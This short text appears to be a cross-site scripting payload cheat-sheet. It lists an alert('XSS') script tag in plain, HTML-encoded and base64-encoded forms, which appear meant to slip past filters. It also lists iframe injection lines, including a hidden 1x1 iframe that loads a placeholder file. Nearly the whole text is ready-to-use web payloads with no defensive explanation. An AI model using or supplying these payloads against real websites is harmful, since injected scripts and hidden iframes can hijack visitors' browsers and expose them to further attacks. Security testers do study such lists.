


For simple XSS:
simpler:	<script type="text/javascript">alert("XSS");</script>
simple:		&lt;script type="text/javascript"&gt;alert("XSS");&lt;/script&gt;
Base64:(1)	PHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPmFsZXJ0KCJYU1MiKTs8L3NjcmlwdD4=
Base64:(2)	PA==scriptIA==type="text/javascript"Pg==alert("XSS");PA==/scriptPg==

		<iframe width="1" height="1" frameborder="0" src="[File location]"></iframe>
		<iframe width="100" height="300" frameborder="0" src="www.google.com"></iframe>
		<iframe width="300" height="500" frameborder="0" src="https://www.google.com"></iframe>
		<iframe width="300" height="500" frameborder="0" src="https://www.google.com">This is not so fun!</iframe>



